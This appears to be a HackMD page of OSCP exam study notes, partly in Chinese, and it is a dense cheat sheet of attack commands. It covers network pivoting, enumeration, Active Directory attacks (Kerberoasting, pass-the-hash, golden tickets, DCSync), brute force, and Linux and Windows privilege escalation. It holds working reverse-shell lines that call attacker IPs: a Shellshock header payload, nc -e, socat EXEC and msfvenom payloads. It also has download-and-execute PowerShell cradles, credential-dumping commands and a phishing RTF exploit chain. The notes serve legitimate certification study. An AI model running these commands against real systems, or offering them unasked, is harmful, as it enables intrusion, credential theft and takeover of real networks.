OSCP - HackMD

# OSCP [ToC] ------------------------------------- ## Notes https://github.com/AidenPearce369/OSCP-Notes https://fareedfauzi.gitbook.io/oscp-notes/ https://book.hacktricks.xyz/welcome/readme https://github.com/Tib3rius/AutoRecon https://hackmd.io/@9PBGIdOQSsCUy3PqgbLrdw/SyZpmXA49 AD:https://zer1t0.gitlab.io/posts/attacking_ad/#domain-name https://hackercat.org/windows/windows-for-active-directoryad-notes file transfer:https://paper.seebug.org/834/#windows https://github.com/swisskyrepo/PayloadsAllTheThings Web可以參考這一篇:https://github.com/stevenyu113228/My-Security-Resources 一堆資源根本神：https://github.com/swisskyrepo/PayloadsAllTheThings ## Pivoting https://blog.csdn.net/qq_27828281/article/details/90742449 ### chisel https://www.codebuug.com/cs115242849/ https://github.com/jpillora/chisel * 正向:攻擊機訪問127.0.0.1:5555可以訪問內網的8000 外網: `./chisel client [中繼IP]:[中繼監聽的port] [轉給攻擊機的port]:[目標IP]:[目標內網Port]` `ex：./chisel client 10.10.11.105:6666 5555:127.0.0.1:8000` 內網: `./chisel server -p 6666` * 反向:攻擊機訪問127.0.0.1:5555可以訪問內網的8000 外網: `./chisel server -p [監聽給目標連的port] --reverse` `EX：./chisel server -p 6666 --reverse` 內網: `./chisel client [中繼IP]:[連到攻擊機的監聽port] R:[轉給攻擊機的port]:[目標IP]:[要連的內網port]` `EX：./chisel client 10.10.14.3:6666 R:5555:127.0.0.1:8000` * 動態: 外網:`./chisel server -p 6666 --reverse` 內網:`./chisel client 10.10.14.3:6666 R:socks` proxychain:/etc/proxychains4.conf `proxychains4 curl http://127.0.0.1:8000 ` * Windows 配置於C2上開啟雙網卡PORT 轉發 kali:192.168.49.54 8080 C2:192.168.54.101 172.16.54.101:4444 內網:172.16.54.102 `netsh interface portproxy add v4tov4 listenport=4444 listenaddress=172.16.54.101 connectport=8080 connectaddress=192.168.49.54` 透過C2下載外網mimikatz至172.168.54.102 `powershell -nop -ep bypass -c iex(new-object system.net.webclient).downloadfile(‘http://172.16.54.101:4444/mimikatz.exe’,'c:\users\public\mimikeatz.exe’)` ![](https://i.imgur.com/cpIbtDv.png) ### ssh pivoting https://johnliu55.tw/ssh-tunnel.html https://blog.stevenyu.tw/2022/08/11/ssh-tunnel-port-forwarding-%E9%80%9F%E8%A8%98%E6%B3%95/ 先將public key 傳給目標authorized_keys * 正向:攻擊機訪問127.0.0.1:5555可以訪問內網的8000 `ssh strapi@10.10.11.105[目標] -L 5555:127.0.0.1:8000` * 動態: `ssh strapi@10.10.11.105 -D 1080[sock]` * SSH PORT 執行 Double Pivoting `ssh -N -L 0.0.0.0:4455:172.16.50.217:445 database_admin@10.4.50.215` 這意思是自己主機的 4455 port 透過下面那台10.4.50.215 的 22port 再轉到 172.16.50.217 的 445 port 等於是 Double Pivoting的狀況 * 動態轉發 <不受限特定port> `ssh -N -D 0.0.0.0:9999 database_admin@10.4.50.215` 這意思是自己主機的 999 port 透過下面那台10.4.50.215 的 22port 再轉到 172.16.50.X 網段 `ssh -N -R 127.0.0.1:2345:10.4.50.215:5432 kali@192.168.118.4` * Remote Port Forwarding `ssh -N -R 127.0.0.1:2345:10.4.50.215:5432 kali@192.168.118.4` * Dynamic Remote Port Forwarding `ssh -N -R 9998 kali@192.168.118.4` 簡單來說就是繞過防火牆的機制 ### Socat `socat -ddd TCP-LISTEN:2345,fork TCP:10.4.50.215:5432` ## Internet Enumeraion ### Rustscan `rustscan -a <IP>` 快速掃描開啟port `rustscan -a <IP> --range 1-1000 --scan-order "Random"` `rustscan -a <IP> -- -sC -sV -O -T4 -n` 結合nmap功能使用 ### nc `nc -zv 10.4.152.64 9000-9100 -w 1 ` 戳端口 ### nmap - Static Binary - https://github.com/ernw/static-toolbox/releases - https://github.com/andrew-d/static-binaries/blob/master/binaries/windows/x86/nmap.exe - Parameters - `-A` : Enable OS detection, version detection, script scanning, and traceroute - `-p-` : Scan all ports - `-p 1000-9999` : Scan port from 1000 to 9999 - `-sV` : Services version - `-Pn` : No ping - `--script=vuln` : Scan vulnerability - `-p139,445` : Only scan 139,445 port - `-sn` : Host ping scan - `--source-port 4444` : use source port 4444 to scan - Fast UDP Scan - `sudo nmap -sUV -T4 -F --version-intensity 0 {IP}` - 常用腳本 `nmap <IP> -p <port> -sC -sV -T4 -n ` `nmap --script vuln [ip target]` `nmap -p 80 --script=*vuln* [ip target]` `sudo nmap -p- --min-rate 10000 -oA scans/nmap-alltcp <IP>` `sudo nmap -p <port> -sCV -oA scans/nmap-tcpscripts <ip>` ### DNS Enumeration ``` nslookup server ip dig @10.10.10.192 blackfield.local dig axfr @10.10.10.175 sauna.htb dig @10.10.11.174 +short support.htb any dnsrecon -d megacorpone.com -t std dnsrecon -d megacorpone.com -D ~/list.txt -t brt dnsenum megacorpone.com nslookup mail.megacorptwo.com nslookup -type=TXT info.megacorptwo.com 192.168.50.151 ``` ## Reverse shell https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet https://www.revshells.com/ https://highon.coffee/blog/reverse-shell-cheat-sheet/ https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md ### Encounter no Interactive * `python -c 'import pty;pty.spawn("/bin/bash")'` * `python3 -c 'import pty;pty.spawn("/bin/bash")'` * `python3 -c 'import pty; pty.spawn("/bin/sh")'` 取得完整shell * `/usr/bin/script -qc /bin/bash /dev/null` ``` 按Ctrl + z 會顯示 [1]+ Stopped nc -nvlp 1234 stty raw -echo; fg 按兩次Enter stty -a 拿到raws跟colums的值後，在剛剛升級的tty上寫下: export TERM=xterm-256color stty rows 32 colums 69 這樣我們就得到一個足夠好用的tty了 ``` ### nc https://github.com/int0x33/nc.exe ``` #LISTENING: nc -lvnp IP port #Conneting nc -e /bin/sh [listen_ip] [listen_port] ``` * Transfer file 收檔:`nc -lvp 8888 > out.file` 傳檔:`nc 10.10.14.3 8888 < outfile` ### socat ``` #LISTENING: socat -ddd TCP4-LISTEN:<listen_port> STDOUT #Conneting socat TCP4:10.11.0.22:443 EXEC:/bin/bash #Port Forwarding socat -ddd TCP-LISTEN:2345,fork TCP:10.4.50.215:5432 ``` ### Posgre SQL ``` #Login psql -h 192.168.50.63 -p 2345 -U postgres #Use it \l : 列出所有的databases \c : <databases> 進入某一個databases ``` ### ssh `ssh -i rsa_id user@ip` ### window reverse shell payload https://github.com/t3l3machus/hoaxshell ### impacket (python script for network) https://github.com/SecureAuthCorp/impacket.git https://www.cnblogs.com/backlion/p/10676339.html https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a ## Target enumeration ### Nmap script to enumerate ``` nmap --script smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-services,smb-enum-sessions,smb-enum-shares,smb-enum-users,smb-protocols,smb-os-discovery -p <port> <IP> nmap --script smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-cve-2017-7494.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse,smb-vuln-regsvc-dos.nse,smb-vuln-webexec.nse -p<port> <IP> sudo nmap -p80 --script=http-enum <IP> sudo nmap -p80 -sV 192.168.50.20 ``` 測試有沒有SMB的漏洞 ### smbmap `smbmap -H IP` `smbmap -H 10.10.10.100 -d (DOMAIN) -u (USER) -p (PASSWORD) ` `smbmap -H 10.10.10.192 -u null` 這個也要測 ### nbtscan `nbtscan -r IP` ### enum4linux `enum4linux -A -a IP` 可以大量爆破SMB有關的服務 ### smbclient `smbclient -L IP -U USER` `smbclient //10.10.10.149/IPC$ -U hazard` `smbclient -N //10.10.10.169/admin$` ``` Download all file : recurse ON prompt OFF mget * ``` ### rpc https://room362.com/post/2017/reset-ad-user-password-with-linux/ `rpcclient -U support 10.10.10.192` `rpcclient -U "" -N 10.10.10.161` `enumdomusers` 枚舉使用者 `enumdomgroups` 枚舉使用者群組 `querygroup 0x200` 查看群組訊息 `queryuser XXXX` 查看使用者訊息 `setuserinfo2 administrator 23 '1qaz@WSX'`修改使用者帳號密碼 * mssqlclient `python3 mssqlclient.py [Target_IP] -windows-auth` ### smtp `telnet <IP> 25` * 確認使用者是否存在 `smtp-user-enum -M <RCPT> -U <test-users.txt> -t <10.10.10.77>` ## Windows 滲透思路 https://i.imgur.com/3D0GDwH.jpg ## Windows Enumeration ### Kerbrute * Password Spraying `kerbrute passwordspray --dc <ip> -d <domain> user.txt <password>` * Can find As-Rep roasting user `kerbrute userenum -d <domain> /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc <ip>` ### Kerberosting * powershell `powershell -exec bypass -c IEX (New-Object System.Net.Webclient).DownloadString('https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1');import-module .\powerview.ps1;Get-NetUser -SPN` * 走 Impacket <IP 要是 DC的IP> `sudo impacket-GetUserSPNs -request -dc-ip 192.168.50.70 corp.com/pete` ### winpeas https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS/winPEASexe ### windapsearch list ldap name https://github.com/ropnop/windapsearch.git `python windapsearch.py -d hb.local --dc-ip 10.10.10.161 -U` `python windapsearch.py -d hb.local --dc-ip 10.10.10.161 --custom "objectclass=*"` the user in the dnsadmins group DNS Admin Privesc in Active Directory (AD)(Windows) https://medium.com/techzap/dns-admin-privesc-in-active-directory-ad-windows-ecc7ed5a21a2 ### windows-exploit-suggester 第一步先打進去後下systeminfo 把裡面的資訊摳出來存在txt檔裡 `./windows-exploit-suggester.py --database 2023-03-01-mssb.xls --systeminfo systeminfo.txt ` `./windows-exploit-suggester.py --upgrade` 更新 ## Windows Attack ### Rubeus 使用 #### 申請TGT `Rubeus asktgt /user:<account> /password:<Password> /domain:corp.com /dc:"ad01.corp.com" /nowrap /ptt /outfile:ticket.kirbi` /nowrap:可以讓輸出的Ticket 格式更加友好 /ptt: 將ticket 導入記憶體中 /outfile: 輸出成檔案 (可加可不加) #### As-Rep Roasting `Rubeus.exe asreproast /format:<hashcat or john> /outfile:<hash.txt>` 使用後會回彈在AD內設定Kerberos 預身分驗證的AD帳號密碼拿到密碼後可以透過 hashcat or John 進行密碼拆解 #### Kerberoasting `Rubeus.exe kerberoast /format:<hashcat or john> /outfile:<hash.txt>` 會自動搜尋AD內具有SPN的用戶，並且拿回該服務帳號的密碼給hashcat or john進行拆解 #### Pass the `Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt` ### mimikatz 使用 #### 常用 Module * sekurlsa 用來枚舉Ticket or 密碼 hash之模組 * privilege 用來提權之模組 * kerberos Kerberos 相關之模組 * lsadump Lsadump之模組 #### 使用方法 ``` mimikatz privilege::debug 提權使用 mimikatz token::elevate mimikatz sekurlsa::logonpasswords 列出所有的用戶憑據 mimikatz sekurlsa::tickets 列出所有在記憶體中的TGT ``` * List all available kerberos tickets in memory `mimikatz sekurlsa::tickets` * Dump SAM Database `mimikatz lsadump::sam` * Dump SECRETS Database `mimikatz lsadump::secrets` * DCSync `mimikatz lsadump::dcsync /domain:<DomainFQDN> /all` ### As-Rep Roasting #### GetNPUsers `python3 GetNPUsers.py <domain>/<account>:<password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>` 主要格式長這樣 `python GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>` 用使用者清單方式逐一爆破 `impacket-GetNPUsers -dc-ip IP -userfile user.txt -format <john or hashcat> <domain>/` 走LAP的方式 `impacket-GetNPUsers -dc-ip 10.10.10.161 -request 'htb.local/'` `GetNPUsers.py -dc-ip 192.168.1.105 ignite.local/ -usersfile users.txt -format john -outputfile hashes` 可以把NTLM Hash轉成John能爆破的格式轉成hashes檔案儲存 #### Rubeus `Rubeus.exe asreproast /format:<hashcat or john> /outfile:<hash.txt>` ### Kerberoasting #### GetUserSPNs `python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>` 格式長這樣 * 請求註冊於用戶下的所有SPN，並保存為hash.txt `python3 GetUserSPNs.py -request -dc-ip <ip> <domain>/<user>:<password> -outfile hash.txt` * 請求Wayne的SPN TGS 並保存為hash2.txt `python3 GetUserSPNs.py -request -dc-ip <ip> <domain>/<user>:<password> -outfile hash2.txt -request-user <wayne>` `for user in $(cat user.txt);do GetNPUsers.py -no-pass -dc-ip <ip> htb/${user} | grep -v Impacket;done` 找到user後建立txt檔去找他們的hash #### Rubeus * 撈TGS-REP (Kerberosting) `Rubeus.exe kerberoast /format:<hashcat or john> /outfile:<hash.txt>` 會自動搜尋AD內具有SPN的用戶，並且拿回該服務帳號的密碼給hashcat or john進行拆解 #### mimikatz `kerberos::ask/target: server/win7.xie.com:1433/MSSQL` #### PowerShell `iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1") Invoke-Kerberoast -OutputFormat <TGSs_format [hashcat | john]> | % { $_.Hash } | Out-File -Encoding ASCII <output_TGSs_file>` ### PTH (Pass The Key/Pass the Hash) #### getTGT * Request the TGT with hash `python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>` * Request the TGT with aesKey (more secure encryption, probably more stealth due is the used by default by Microsoft) `python getTGT.py <domain_name>/<user_name> -aesKey <aes_key>` * Request the TGT with password `python getTGT.py <domain_name>/<user_name>:[password]` * Set the TGT for impacket use `export KRB5CCNAME=<TGT_ccache_file>` * 登入 ``` python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass ``` ### Pass the Ticket 當打進某一台機器，且有高權限但無法進行橫向移動時，可以透過mimikatz `sekurlsa::tickets /export` 匯出看看有沒有可以利用的TGS 可以進行橫向移動 `kerberos::ptt [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi` 匯入憑證後即可存取該服務之權限 ### Silver Ticket #### Ticketer * To generate the TGS with NTLM `python ticketer.py -nthash <ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>` * To generate the TGS with AES key `python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>` * Set the ticket for impacket use `export KRB5CCNAME=<TGS_ccache_file>` * Execute remote commands with any of the following by using the TGT ``` python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass ``` #### mimikatz * To generate the TGS with NTLM `mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<ntlm_hash> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>` * To generate the TGS with AES 128 key `mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>` * To generate the TGS with AES 256 key (more secure encryption, probably more stealth due is the used by default by Microsoft) `mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>` * Inject TGS with Mimikatz `mimikatz # kerberos::ptt <ticket_kirbi_file>` #### Rubeus `Rubeus.exe ptt /ticket:<ticket_kirbi_file>` ### Golden Ticket #### Ticketer * To generate the TGT with NTLM `python ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> <user_name>` * To generate the TGT with AES key `python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> <user_name>` * Set the ticket for impacket use `export KRB5CCNAME=<TGS_ccache_file>` * Execute remote commands with any of the following by using the TGT ``` python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass ``` #### mimikatz * To generate the TGT with NTLM `mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<krbtgt_ntlm_hash> /user:<user_name>` * To generate the TGT with AES 128 key `mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name>` * To generate the TGT with AES 256 key (more secure encryption, probably more stealth due is the used by default by Microsoft) `mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name>` * Inject TGT with Mimikatz `mimikatz # kerberos::ptt <ticket_kirbi_file>` #### Rubeus `Rubeus.exe ptt /ticket:<ticket_kirbi_file>` ### DCSync #### secretsdump https://pure.security/dumping-windows-credentials/ https://wwwstar.medium.com/%E5%85%A7%E7%B6%B2%E6%BB%B2%E9%80%8F-pass-the-hash-pth-%E6%94%BB%E6%93%8A%E6%89%8B%E6%B3%95%E5%8F%8A%E9%98%B2%E7%A6%A6-%E5%81%B5%E6%B8%AC%E6%8E%AA%E6%96%BD-e1d15e807a67 * 倒出所有用戶的Hash值 `impacket-secretsdump 'domain/user:pass@IP -just-dc'` `impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL > hash.txt` `secretsdump.py -system system.save -ntds ntds.dit LOCAL` * 導出Krbtgt 的帳戶Hash `secretdump.py <domain>/<account>:<password>@<DC_IP> just-dc-user krbtgt` ``` reg save HKLM\SYSTEM c:\system.save & reg save HKLM\SAM c:\sam.save mimikatz # lsadump::sam /system:c:\system.save /sam:c:\sam.save ``` #### 內網情況下可以用Mimikatz `lsadump::dcsync /domain:<domain> /all(可替換使用者) /csv` ### 橫向移動 (psexec...等) #### psexec * Hash登入 (Domain方式) `impacket-psexec domain/user@ip -hashs hash:hash` `psexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e' -dc-ip 10.129.95.153 administrator@10.129.95.153` * 密碼登入 `impacket-psexec htb.local/svc-alfresco:s3rvice@10.129.143.194` * Windows 橫向移動 `./PsExec64.exe -i \\FILES04 -u corp\jen -p Nexus123! cmd` #### smbexec * 密碼登入 `impacket-smbexec htb.local/svc-alfresco:s3rvice@10.129.143.194` * Hash登入 `impacket-smbexec htb.local/svc-alfresco@10.129.143.194 -hashes <hash>` * 使用不同編碼登入 (預設是 UTF-8) `impacket-smbexec htb.local/svc-alfresco@10.129.143.194 -codec gbk` * 更換共享資料夾 (預設是C\$) `impacket-smbexec htb.local/svc-alfresco@10.129.143.194 -codec gbk -share admin$` #### ntlmrelayx [frauding to get ticket] `impacket-ntlmrelayx -t ldap://10.10.10.161 --escalate-user john` `impacket-psexec 'htb.local/john:abc123!@myip'` #### wmiexec * Hash登入 `wmiexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff' -dc-ip 10.10.10.175 administrator@10.10.10.175` * 密碼登入 `wmiexec htb.local/svc-alfresco:s3rvice@10.129.143.194` #### dcomexec * Hash登入 `dcomexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff' -dc-ip 10.10.10.175 administrator@10.10.10.175` * 密碼登入 `dcomexec.py htb.local/svc-alfresco:s3rvice@10.129.143.194` #### lookupsid `impacket-lookupsid hazard:stealth1agent@10.10.10.149` #### Ldapsearch `ldapsearch -x -H "ldap://<10.10.10.175>" -s base namingcontexts` `ldapsearch -x -H "ldap://10.10.10.161" -b "DC=htb,DC=LOCAL" -s sub ` `ldapsearch -x -H ldap://dc.support.htb -D 'hack@xie.com' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "CN=Users,DC=SUPPORT,DC=HTB" ` #### Evil-winrm 5985 5986 `evil-winrm -i IP -u User -p Password ` `evil-winrm -i IP -u User -H hash ` `evil-winrm -i 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -s . -S` ***`Bypass-4MSI`*** ## bruteforce ### crackmapexec `crackmapexec smb 10.10.10.169 -u /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -p 'Welcome123!' --continue-on-success` `crackmapexec smb 192.168.50.75 -u users.txt -p 'Nexus123!' -d corp.com --continue-on-success` ### hydra ` hydra 10.10.10.43 -l 0xdf -P /usr/share/seclists/Passwords/twitter-banned.txt https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password"` -p 密碼 -P 字典檔 -l 帳號後面那一段為要爆網頁密碼的時候要添加的 ### 目錄爆破 * 子目錄爆破 `ffuf -c -w <wordlist> -u http://<url>/FUZZ` `dirsearch.py -u <url>` `gobuster dir -u <URL> -w <wordlist> -x .php,.html` `gobuster dir -u <IP> -w /usr/share/wordlists/dirb/common.txt -t 5` * Sub-Domain 爆破 `ffuf -c -w <wordlist> -u http://FUZZ.<url>` `gobuster dns -d <domain> -w <wordlist>` #### Responder get NTLM hash `sudo Respondere -I etho` #### xfreerdp `xfreerdp /v:{ip} /cert:ignore /u:{username} /size:80%` #### ssh problem `ssh -o KexAlgorithms=diffie-hellman-group1-sha1 -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedKeyTypes=+ssh-rsa root@10.10.10.7` #### SIP extension `svwar -m INVITE -e100-999 10.10.10.7` https://zhuanlan.zhihu.com/p/354513767 #### lsass.dmp open https://en.hackndo.com/remote-lsass-dump-passwords/ #### Subversion Repository Service - Port 3690 `svn list svn://10.10.10.203:3690` `svn cat svn://10.10.10.203:3690/moved.txt` `svn checkout svn://10.10.10.203:3690` `svn diff -r2` https://idiothacker.com/hackthebox-walkthrough-worker/ #### smtp `smtp-user-enum -M RCPT -U mail.txt -t 10.10.10.77` * cve-2017-0199 https://github.com/bhdresh/CVE-2017-0199 `msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=6666 -f hta-psh -o msfv.hta` `python2 CVE-2017-0199/cve-2017-0199_toolkit.py -M gen -w invoice.rtf -u http://10.10.14.3:8000/msfv.hta -t rtf -x 0` `sendEmail -f 0xdf@megabank.com -t nico@megabank.com -u "Invoice Attached" -m "You are overdue payment" -a invoice.rtf -s 10.10.10.77 -v` #### mount `mount -t cifs //10.10.10.134/backups /mnt -o user=,password=` ``` ## Web滲透 ### Shellshock * 檢查路徑下是否存在Shell shock `nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/<user.sh> <IP>` *　POC `User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/<IP>/443 0>&1` ## Linux https://medium.com/schkn/linux-privilege-escalation-using-text-editors-and-files-part-1-a8373396708d * 提權神網站 https://gtfobins.github.io/ * PATH `export PATH=/tmp:$PATH` `echo $PATH` #### linpeas `curl http://10.10.14.5:8000/linpeas.sh | sh ` #### Linux priv * Linux SUID ```#Find SUID find / -perm -u=s -type f 2>/dev/null ``` ![](https://i.imgur.com/UQ0E1gp.png) ``` CMD=“/bin/sh” php7.4 -r “pcntl_exec(‘/bin/sh’, [‘-p’]);” ``` ``` #Find GUID find / -perm -g=s -type f 2>/dev/null ``` * uname -a <4.4.0 https://www.exploit-db.com/exploits/44298 * pwnkit pkexec https://github.com/arthepsy/CVE-2021-4034 * Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation https://www.cnblogs.com/xiaozi/p/13370721.html `gcc 44298.c -o a.out` * 如果排程有備份功能，可以用捷徑方式一起備份 `ln -s /home/luis/ /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/` * sudo exiftool ``` LFILE:/usr/bin/calendar INPUT=/bin/bash sudo exiftool -filename $LFILE $INPUT (多執行幾次) ``` ## Windows 提權 https://github.com/nickvourd/Windows_Privilege_Escalation_CheatSheet https://github.com/gtworek/Priv2Admin ### Potato * Juicy Potato https://github.com/ohpe/juicy-potato * Lovely Potato (Automating juicy potato) https://github.com/TsukiCTF/Lovely-Potato * Local Potato * God Potato * Rogue Potato https://github.com/antonioCoco/RoguePotato * PrintSpoofer(Win Server 2016 2019 Win10) https://github.com/itm4n/PrintSpoofer `where /r c: *password*` * DNS Admin group PrivEsc(domain group : Dnsadmin) ` msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.11 LPORT=443 -f dll -o rev.dll` `smbserver.py s . -smb2support -username df -password df` `net use \\10.10.14.14\s /u:df df` or `smbserver.py Desktop . -smb2support` `powershell copy \\192.168.32.128\Desktop\a.html .` `dnscmd.exe /config /serverlevelplugindll \\10.10.14.11\s\rev.dll` `sc.exe \\resolute stop dns` `sc.exe \\resolute start dns` LINUX: `smbget smb://192.168.32.128/SMB/id_rsa -o id` * Copy-FileSeBackupPrivilege SeBackupPrivilege (domain group :*Backup Operators) https://github.com/giuliano108/SeBackupPrivilege https://medium.com/r3d-buck3t/windows-privesc-with-sebackupprivilege-65d2cd1eb960 useful: https://raw.githubusercontent.com/Hackplayers/PsCabesha-tools/master/Privesc/Acl-FullControl.ps1 `Acl-FullControl -user 'blackfield\svc_backup' -path C:\users\administrator` * Checking AlwaysInstallElevated AlwaysInstallElevated set to 1 in HKLM! AlwaysInstallElevated set to 1 in HKCU! `msfvenom -p windows -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.14.6 LPORT=443 -f msi -o rev.msi` `msiexec /quiet /qn /i rev.msi` * check priv ``` icacls Administrator # F 完整存取 M 完整修改 icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone" icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "Everyone" 新增權限 icacls root.txt /grant alfred[使用者]:F ``` * RDP ``` net localgroup "Remote Desktop Users" "<account>" /add reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f reg add “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f ``` powershell `Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0` * mimikatz ``` privilege::debug sekurlsa::logonpasswords ``` ``` lsadump::secrets "vault::cred /patch ``` `reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f` 目標為Win10 或 Windows Server 2012版本以上時可透過修改註冊碼執行Mimikatz(需要重開機) ## 密碼相關 #### hashcat https://hashcat.net/wiki/doku.php?id=example_hashes `hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt ` * Base64 `cat <檔名> | base64 -d > <檔名>.decode` * zip2john 轉zip to hash `zip2john <檔名> 2>/dev/null | tee <檔名>.hash ` * John `<檔案>.hash --wordlist=/usr/share/wordlists/rockyou.txt --format=<PKZIP格式>` * 破解TGS-REP (Kerberosting) `sudo hashcat -m 13100 hashes.kerberoast2 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force` * 破解 AS-REP (AS-REP) `sudo hashcat -m 18200 hashes.asreproast2 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force` ## Powershell ### Download `Powershell -c "IWR -useBasicParsing http://10.10.14.3:8000/SharpHound.ps1 -OutFile ./SharpHound.ps1"` `powershell -exec bypass -c "iex(new-object system.net.webclient).downloadstring('http://<host>/PowerUp.ps1'); invoke-AllChecks"` `certutil -urlcache -f http://10.10.16.35:8000/ms11-046.exe ms11-046.exe` host `python2.7 smbserver.py share 'pwd'` 開啟smbserver client `copy \\<IP>\<sharename>\<file>.exe <file>.exe`複製檔案上傳檔案 `net use \\10.10.14.26\mac /u:mac mac` `copy 20220314010252_BloodHound.zip \\10.10.14.26\mac\` ### 破密 * 可以破解cred.xml密碼 `powershell -c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *` ### PrivescCheck https://github.com/itm4n/PrivescCheck * 下載加執行 `powershell -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.2:8000/PrivescCheck.ps1'); Invoke-PrivescCheck"` ### Bloodhound * 下載 `IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.3:8000/SharpHound.ps1');` * 執行 `invoke-bloodhound -collectionmethod all -domain htb.local -ldapuser svc-alfresco -ldappass s3rvice` * 用Python就在自己host端就能執行 `bloodhound-python -d <htb.local> -u <svc-alfresco> -p <s3rvice> -gc <forest.htb.local> -c all -ns <10.129.75.109> --zip ` ### Powerview 3.0 https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993 https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-powerview * 下載並匯入模組 `certutil -urlcache -split -f http://10.10.14.3:8000/PowerView.ps1 import-module ./PowerView.ps1` Get Current Domain: `Get-ADDomain` Enum Other Domains: `Get-ADDomain -Identity <Domain>` Get Domain SID: `Get-DomainSID` Get Domain Controlers:`Get-ADDomainController` Enumerate Domain Users: `Get-ADUser -Filter * -Identity <user> -Properties` Enum Domain Computers:`Get-ADComputer -Filter * -Properties` * 修改擁有者 `Set-DomainObjectOwner -identity claire -OwnerIdentity tom` 把claire 這個物件擁有權調整給tom * 調整修改密碼權限 `Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword` 賦予Tom 可以修改 Claire密碼的權限 * 修改Password (修改Herman的password) ``` $passwd = ConvertTo-SecureString -String 'miku123$' -AsPlainText -Force Set-DomainUserPassword -Identity Herman -AccountPassword $passwd ``` * 